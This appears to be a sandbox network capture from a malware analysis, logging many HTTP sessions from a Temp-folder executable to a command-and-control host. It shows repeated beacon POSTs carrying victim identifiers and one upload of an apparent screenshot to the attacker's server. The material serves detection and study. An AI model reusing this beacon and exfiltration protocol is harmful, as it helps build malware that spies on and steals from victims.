                          Nov 12, 2021 22:24:29.533066988 CET16330OUTData Raw: 41 26 9f 9d c5 ce ff 00 0b 1a fe 2b be b6 d5 3c 61 ac 5f d9 49 e6 db 5c 5d 3c 91 3e d2 bb 94 9e 0e 08 04 7e 35 91 49 4a 29 c2 2a 11 51 5d 09 93 bb b9 d2 78 3b 52 b6 d3 67 d5 c5 c5 ed 9d 9b dd 69 cd 04 32 5e db 1b 88 77 f9 b1 b6 19 02 3e 46 15 ba
                          Data Ascii: A&+<a_I\]<>~5IJ)*Q]x;Rgi2^w>FeM)j{[nb[yVuP0UH!0OL4TwQwhu:I't*wOzS-|U%,/#-c-f8\=%>VIytY)o$k+x<
                          Nov 12, 2021 22:24:29.558727026 CET16572INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:29 GMT
                          Content-Type: text/html
                          Content-Length: 0
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          X-Powered-By: PHP/5.6.37


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          346192.168.2.450173178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:29.461476088 CET15957OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:29.558146000 CET16572INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:29 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          347192.168.2.450175178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:29.717760086 CET16573OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:29.834016085 CET16574INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:29 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          348192.168.2.450176178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:29.986485004 CET16575OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:30.094290972 CET16575INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:30 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          349192.168.2.450177178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:30.234415054 CET16576OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:30.354269028 CET16992INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:30 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          35192.168.2.449819178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:30.464189053 CET4007OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:30.490123034 CET4007INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:30 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          350192.168.2.450178178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:30.500457048 CET16993OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:30.609862089 CET16993INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:30 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          351192.168.2.450179178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:30.756516933 CET16994OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:30.784336090 CET16994INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:30 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          352192.168.2.450180178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:30.894165039 CET16995OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5
                          Host: depressionk1d.ug
                          Content-Length: 106671
                          Cache-Control: no-cache
                          Nov 12, 2021 22:24:30.894665956 CET16995OUTData Raw: 2d 2d 2d 2d 2d 2d 64 62 31 61 31 31 38 32 39 30 35 34 33 65 62 61 33 66 33 31 37 30 66 64 34 32 66 32 62 38 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------db1a118290543eba3f3170fd42f2b8f5Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:24:30.894855022 CET17005OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:24:30.894953012 CET17008OUTData Raw: c9 35 0e b5 35 bb 21 ce 2b a9 95 45 49 34 7e 54 f2 47 9c ec 62 b9 f5 c5 47 5a 27 72 82 8a 5a 28 01 28 a5 a2 80 12 96 97 14 62 80 12 8a 5a 3b d0 02 51 4b 45 31 06 28 a0 52 d1 60 12 8a 5a 50 29 88 4c 52 d1 8a 0d 00 14 51 8a 5a 00 4c 51 8a 5c 51 8a
                          Data Ascii: 55!+EI4~TGbGZ'rZ((bZ;QKE1(R`ZP)LRQZLQ\QaqR@%((4QJ)h1@KEc4SbF(\e.=iamR,.(cq.)hIv(Qv))X.'4sF(Z9ME4\PE6Z)XbQKE%Q`REJ)iCI
                          Nov 12, 2021 22:24:30.917351961 CET17011OUTData Raw: 42 41 c1 e0 f2 2b ca a9 1e 6a 95 17 9a fc 91 ee aa 9e ce 96 1e 76 4e d1 7b ff 00 8e 64 1a 07 87 e1 d2 2d 33 2a c7 2d ec 8c 64 9a 6c 64 ee 3d 81 3c e0 74 1f 9d 2d c7 85 f4 bb 99 fc c6 8a 55 46 90 48 f0 47 33 2c 4e c3 9c b2 03 82 6b 8a 3a ff 00 88
                          Data Ascii: BA+jvN{d-3*-dld=<t-UFHG3,Nk:,v\]Gw$V5g]/'7mB&f\c/gr34"NlbI?Z"0Lt?EWqQ@%PRS(J3@Q
                          Nov 12, 2021 22:24:30.917395115 CET17017OUTData Raw: 7d 09 7c 37 64 c0 4c 62 b2 31 33 74 ce dd a3 35 e6 92 6a be 26 89 ee 12 6b fd 5d 1e db fd 7a bc b2 83 17 38 f9 b2 7e 5e 48 1c f7 35 9d 75 7f 79 7d b7 ed 77 73 dc 6c ce df 3a 42 fb 73 d7 19 fa 54 41 4d 38 b4 f4 45 4a 51 b3 d3 56 6b 26 b7 0b 7d f8
                          Data Ascii: }|7dLb13t5j&k]z8~^H5uy}wsl:BsTAM8EJQVk&}~5^U_TuG`k<"Y0[djXI$cauw>Iz}kv{=20i)Om5!erlyA7qo.C[c?#\|R^Y]
                          Nov 12, 2021 22:24:30.917474985 CET17027OUTData Raw: 4a 00 43 4c 27 34 e2 73 4d a4 c6 86 56 cf 86 7f e4 25 27 fd 71 3f cc 56 2d 6d 78 67 fe 42 52 7f d7 13 fc c5 6b 85 fe 34 4c b1 7f c1 91 d5 d6 ff 00 87 3c 21 a9 f8 96 4d d6 c8 23 b6 53 87 b8 93 ee 83 e8 3d 4d 65 e9 96 2f a9 ea 96 d6 48 42 99 a4 09
                          Data Ascii: JCL'4sMV%'q?V-mxgBRk4L<!M#S=Me/HBQ=uG1PimFU'j^7:Q=pXxUwek->uBHwh-$c>*%K+ l=1^Khh.Fz5Zu$(bi
                          Nov 12, 2021 22:24:30.917495966 CET17031OUTData Raw: 06 8d be fa 03 52 e6 d0 29 eb a9 9d b6 8d 80 f6 ad 51 69 6f 2f dc 62 b4 36 95 2f 54 65 6a 9f 6d 1e a6 8a 32 7a a3 24 c0 08 a8 5e d3 22 b5 9a ce 68 fe fc 4d 51 f9 5e d5 4a a4 58 b9 e5 1d cc 29 6c fd ab 3e 7b 2f 6a eb 0d be e1 d2 a0 92 c7 23 ee 9a
                          Data Ascii: R)Qio/b6/Tejm2z$^"hMQ^JX)l>{/j#OFMLIMJtb]i8j:1Tek@,W$DfCt3 ?s)WEpAIo3o)kKXdPt-^6B=yyFxkfy
                          Nov 12, 2021 22:24:30.917522907 CET17034OUTData Raw: 8c 52 f9 c3 f8 51 45 17 64 ba 9e 45 41 1c a7 a2 13 f8 54 8b 6f 31 fe 1c 7d 6a 73 33 f6 c0 a6 99 1f fb c6 8d 49 e7 6c 05 ab 77 75 1f 8d 3c 5b a0 eb 27 e5 51 ee 3e b4 80 d3 b3 25 dd 96 36 40 a7 ef 13 4e df 0a f4 50 6a b6 68 a3 90 9b 16 85 d0 1f 75
                          Data Ascii: RQEdEATo1}js3Ilwu<['Q>%6@NPjhuU\^#,{~`4#7V'QG${*5<_[W/V.>Cd;1^!gGF=nl5}NPF;m)hV(\$|.<oZO7Z$dW
                          Nov 12, 2021 22:24:30.939999104 CET17061OUTData Raw: 9a 70 aa 44 b1 f4 52 52 d5 12 38 53 81 a6 0a 75 52 25 a2 50 78 a7 e6 a2 06 9c 0d 5a 64 34 48 0d 3c 1a 88 1e 69 cb 56 99 0d 13 03 4f 06 a1 14 fc d5 a6 66 d1 26 68 06 99 9a 50 6a ae 2b 12 06 a7 87 a8 41 a7 83 4d 32 5a 25 0f ef 4f 0f 50 03 4a 0d 51
                          Data Ascii: pDRR8SuR%PxZd4H<iVOf&hPj+AM2Z%OPJQ%!ETPjpErrMS;u#<zNJy^]67N*h+IlFf!Ua9T]H4k*zp)U4aD{STQ{8VHma=8/lNt.8
                          Nov 12, 2021 22:24:30.940057993 CET17072OUTData Raw: 40 f9 fd d4 9e 8a 2b e6 80 6b d2 c0 fc 2c 75 3e 08 fc c5 3c 52 67 9a 42 79 a5 ae e3 01 c2 96 90 52 d3 10 51 9a 42 68 a2 e0 28 a5 ed 40 a2 98 80 f5 a7 af 4a 6d 2e 4d 34 26 3f 3c d1 4d 06 94 1c 9a 62 1d 47 4a 41 4b 4c 42 d0 29 05 2d 02 1c 29 45 36
                          Data Ascii: @+k,u><RgByRQBh(@Jm.M4&?<MbGJAKLB)-)E6%4P!iiE0Gd.ifXRx5H~iKM=(hCN(p4NUE-4t!4)D9S(D4hP4)<U"1NRLQK@
                          Nov 12, 2021 22:24:30.989217043 CET17107INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:30 GMT
                          Content-Type: text/html
                          Content-Length: 0
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          X-Powered-By: PHP/5.6.37


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          353192.168.2.450181178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:30.920149088 CET17034OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:30.942708015 CET17086INHTTP/1.1 503 Service Temporarily Unavailable
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:30 GMT
                          Content-Type: text/html
                          Content-Length: 1230
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          ETag: "5a4b7cd2-4ce"
                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 74 69 74 6c 65 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 20 2d 20 d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 0a 3c 63 65 6e 74 65 72 3e 0a 3c 48 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 62 72 3e d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 3c 21 2d 2d 0a 20 20 20 2d 20 55 6e 66 6f 72 74 75 6e 61 74 65 6c 79 2c 20 4d 69 63 72 6f 73 6f 66 74 20 68 61 73 20 61 64 64 65 64 20 61 20 63 6c 65 76 65 72 20 6e 65 77 0a 20 20 20 2d 20 22 66 65 61 74 75 72 65 22 20 74 6f 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 2e 20 49 66 20 74 68 65 20 74 65 78 74 20 6f 66 0a 20 20 20 2d 20 61 6e 20 65 72 72 6f 72 27 73 20 6d 65 73 73 61 67 65 20 69 73 20 22 74 6f 6f 20 73 6d 61 6c 6c 22 2c 20 73 70 65 63 69 66 69 63 61 6c 6c 79 0a 20 20 20 2d 20 6c 65 73 73 20 74 68 61 6e 20 35 31 32 20 62 79 74 65 73 2c 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 72 65 74 75 72 6e 73 0a 20 20 20 2d 20 69 74 73 20 6f 77 6e 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 2e 20 59 6f 75 20 63 61 6e 20 74 75 72 6e 20 74 68 61 74 20 6f 66 66 2c 0a 20 20 20 2d 20 62 75 74 20 69 74 27 73 20 70 72 65 74 74 79 20 74 72 69 63 6b 79 20 74 6f 20 66 69 6e 64 20 73 77 69 74 63 68 20 63 61 6c 6c 65 64 0a 20 20 20 2d 20 22 73 6d 61 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 22 2e 20 54 68 61 74 20 6d 65 61 6e 73 2c 20 6f 66 20 63 6f 75 72 73 65 2c 0a 20 20 20 2d 20 74 68 61 74 20 73 68 6f 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 61 72 65 20 63 65 6e 73 6f 72 65 64 20 62 79 20 64 65 66 61 75 6c 74 2e 0a 20 20 20 2d 20 49 49 53 20 61 6c 77 61 79 73 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 74 68 61 74 20 61 72 65 20 6c 6f 6e 67 0a 20 20 20 2d 20 65 6e 6f 75 67 68 20 74 6f 20 6d 61 6b 65 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 68 61 70 70 79 2e 20 54 68 65 0a 20 20 20 2d 20 77 6f 72 6b 61 72 6f 75 6e 64 20 69 73 20 70 72 65 74 74 79 20 73 69 6d 70 6c 65 3a 20 70 61 64 20 74 68 65 20 65 72 72 6f 72 0a 20 20 20 2d 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 61 20 62 69 67 20 63 6f 6d 6d 65 6e 74 20 6c 69 6b 65 20 74 68 69 73 20 74 6f 20 70 75 73 68 20 69 74 0a 20 20 20 2d 20 6f 76 65 72 20 74 68 65 20 66 69 76 65 20
                          Data Ascii: <HTML><HEAD><title>503 Service Temporarily Unavailable - </title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><link rel="icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /><link rel="shortcut icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /></HEAD><BODY><center><H1>503 Service Temporarily Unavailable<br> </H1></BODY></HTML>... - Unfortunately, Microsoft has added a clever new - "feature" to Internet Explorer. If the text of - an error's message is "too small", specifically - less than 512 bytes, Internet Explorer returns - its own error message. You can turn that off, - but it's pretty tricky to find switch called - "smart error messages". That means, of course, - that short error messages are censored by default. - IIS always returns error messages that are long - enough to make Internet Explorer happy. The - workaround is pretty simple: pad the error - message with a big comment like this to push it - over the five
                          Nov 12, 2021 22:24:30.942732096 CET17087INData Raw: 68 75 6e 64 72 65 64 20 61 6e 64 20 74 77 65 6c 76 65 20 62 79 74 65 73 20 6d 69 6e 69 6d 75 6d 2e 0a 20 20 20 2d 20 4f 66 20 63 6f 75 72 73 65 2c 20 74 68 61 74 27 73 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f 75 27 72 65 20 72 65 61 64 69
                          Data Ascii: hundred and twelve bytes minimum. - Of course, that's exactly what you're reading - right now. -->


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          354192.168.2.450182178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:31.078808069 CET17107OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:31.106281996 CET17108INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:31 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          355192.168.2.450183178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:31.248143911 CET17108OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:31.273669958 CET17109INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:31 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          356192.168.2.450184178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:31.405376911 CET17109OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
